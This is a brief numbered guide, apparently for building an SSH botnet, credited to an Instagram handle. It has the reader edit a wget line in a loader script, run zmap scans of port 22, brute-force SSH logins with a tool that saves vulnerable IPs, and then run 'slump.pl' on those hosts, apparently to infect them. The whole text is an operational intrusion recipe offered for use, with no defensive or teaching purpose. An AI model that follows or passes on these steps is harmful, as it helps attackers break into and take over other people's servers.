Steps made by- IG-@uogp_


1. change wget in "slump.pl"

2. drag files (slump, Scanner, zmap, pass_file, update)

3. sh Scanner.sh

4. sh zmap.sh

5. cpan force install Parallel::ForkManager
------------------------------------

6.chmod 777 * (u dont have to do this everytime)

7.zmap -p22 -w (your list) -o mfu.txt -B100M

8. ./update 2500 (this is the bruter, when the screen pauses thats when the list is finished bruting and all of the vulnerable ips will be outputted into vuln.txt thats y its important to save the vulns u can also rename them to whatever u want AFTER u save them) 

9. perl slump.pl vuln.txt
